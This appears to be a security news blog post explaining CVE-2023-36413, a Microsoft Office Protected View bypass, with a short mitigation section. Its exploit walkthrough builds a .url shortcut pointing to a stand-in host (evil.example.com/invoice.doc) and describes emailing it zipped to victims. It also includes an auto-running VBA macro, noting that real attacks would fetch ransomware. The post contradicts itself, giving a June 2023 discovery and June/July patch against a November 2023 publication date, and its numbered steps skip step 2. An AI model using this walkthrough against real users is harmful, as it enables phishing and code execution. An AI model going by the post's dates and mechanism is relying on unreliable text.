CVE CyberSecurity Database News

CVE-2023-36413 - Microsoft Office Security Feature Bypass Exploit Explained

Poster -

In June 2023, researchers discovered a security flaw in Microsoft Office that lets attackers bypass built-in protection mechanisms. This post dives deep into CVE-2023-36413, how it works, and how hackers can exploit it—with easy-to-follow code examples and references for those who want to dig even further.

What Is CVE-2023-36413?

CVE-2023-36413 is a "Security Feature Bypass" vulnerability affecting Microsoft Office. In short, it lets attackers trick Microsoft Office into running malicious code from the internet, even when Office's Protected View or security warnings are supposed to stop that.

Affected Products:

Microsoft Office 2013, 2016, 2019, Office LTSC, Office 365 Apps

Severity:
- CVSS Score: 7.2 (NIST NVD listing)

Why This Vulnerability Matters

Normally, when you open a document from the internet, Microsoft Office puts it in "Protected View," showing a yellow warning bar and blocking active content (like macros or OLE objects). This stops malicious files from immediately running code on your computer.

CVE-2023-36413 breaks this defense, allowing attackers to run code with fewer warnings.

Exploit Overview

The core issue is how Office processes Internet Shortcuts (.url files). Attackers create malicious .url files that point to a URL hosting a document with embedded code. When a user opens the shortcut, Office fails to put the opened file in Protected View, so malicious code can run more freely.

Step-by-Step Exploit Example

Here's a step-by-step demo of how an attacker might abuse CVE-2023-36413.

1. Host a Malicious Doc or HTML Application

Suppose the attacker controls a server at http://evil.example.com. They create a malicious HTML Application (.hta) or Word document with embedded payload (macro, OLE, etc.).

For example, host a simple malicious VBA macro doc at

http://evil.example.com/invoice.doc

The attacker creates a .url file pointing to the malicious document

[InternetShortcut]
URL=http://evil.example.com/invoice.doc

Optionally, this could point directly to an .hta to trigger even more dangerous code.

3. Distribute the .url File

The attacker compresses the invoice.url into a ZIP file and emails it to victims, or shares the file through Google Drive, OneDrive, etc.

4. Victim Opens the Shortcut

When a user runs invoice.url, Microsoft Office fetches and opens invoice.doc outside Protected View, thanks to the bug. Malicious code runs.

Here is a simple (harmless) VBA code that could be in invoice.doc

Sub AutoOpen()
    Call Shell("calc.exe", vbNormalFocus)
End Sub

In a real attack, this would download ransomware, steal data, etc.

Why Does This Work?

This exploit leverages a logic error in how Office determines the "zone" of the opened document. Because the user clicked a .url file, Office forgets that the final file came from the internet, so it opens it with full privileges.

Microsoft discusses this here:
- Microsoft Security Response Center, CVE-2023-36413

Mitigation and Patch

Microsoft patched this issue in June/July 2023. If you haven't, update your Office suite!

- Microsoft Security Update Guide

Quick fix if you can't patch

- Block .url files at your email/web gateway.

Use Group Policy to block scripts from internet zones.

See also:
- Talos Intel Advisory
- NIST NVD Entry

Conclusion

CVE-2023-36413 is a classic example of how a small logic bug can destroy a key layer of defense in Microsoft Office. Attacks abusing this flaw are simple and effective—and users may see no warning at all. Always patch promptly and treat files (even links and shortcuts) from external sources with suspicion.

Stay safe, update now!

References:
- MITRE CVE-2023-36413
- Microsoft Security Guide
- Cisco Talos Blog

---

Timeline

Published on: 11/14/2023 18:15:44 UTC
Last modified on: 11/20/2023 20:19:01 UTC